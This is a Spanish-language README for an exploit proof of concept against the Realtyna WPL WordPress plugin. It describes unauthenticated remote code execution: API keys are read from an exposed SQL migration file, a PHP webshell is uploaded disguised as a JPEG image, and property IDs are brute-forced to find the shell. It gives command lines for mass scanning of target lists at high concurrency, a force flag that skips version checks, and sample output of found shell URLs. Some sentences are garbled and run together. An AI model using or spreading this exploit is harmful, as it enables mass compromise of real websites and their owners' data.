
EXPLOIT POC DE CVE-2026-14483 POR MADEXPLOITS
Ejecución remota de código sin autenticación contra el plugin de WordPress Realtyna WPL Real Estate Listing.
| Campo | Detalle |
|---|
| CVE | CVE-2026-14483 |
| Versión afectada | <= 5.2.0 |
| Plugin | real-estate-listing-realtyna-wpl |
| Impacto | Subida de webshell PHP sin autenticación (RCE) |
| Script | CVE-2026-14483.py |
| Autor | MADEXPLOITS |
Por defecto, el script solo explota objetivos que ejecutan WPL 5.2.0. Usa
--forcepara anularlo.

api_key / api_secret predeterminadas quedan expuestas a través de un volcado público de migración SQL.set_property), lo que permite subir un archivo PHP manipulado como imagen de propiedad.wp-content/uploads/WPL/{property_id}/.pip install requests colorama
Crea un archivo de texto con una URL base por línea:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
Las URL de shell encontradas se añaden a result.txt (o --output).
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
| Argumento | Por defecto | Descripción |
|---|---|---|
--targets | (obligatorio) | Archivo con las URL base (una por línea) |
--output | result.txt | Archivo al que añadir las URL de shell encontradas |
--user-id | 1 | ID de usuario de WordPress / WPL propietario de la nueva propiedad |
--payload | shell de subida integrada | Cadena de payload PHP personalizada |
--max-id | 1000 | ID máximo de propiedad para fuerza bruta al localizar la shell |
--timeout | 30 | Tiempo de espera HTTP en segundos |
--threads | 5 | Hilos de trabajo concurrentes |
--debug | off | Registro de depuración verboso |
--force | off | Explotar incluso si la versión ≠ 5.2.0 o la versión no puede detectarse |
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
Marcador de shell por defecto: MADEXPLOITS
Nombre de archivo remoto por defecto: 0x89MADEXPLOITS.php
Objetivo único de laboratorio (este espacio de trabajo):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
Escaneo masivo con mayor concurrencia:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
Forzar el exploit cuando falla la comprobación de versión:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt contiene una URL de shell por línea.
Stable tag: / Version: en el readme.txt del plugin, con wpl.php como respaldo.--max-id.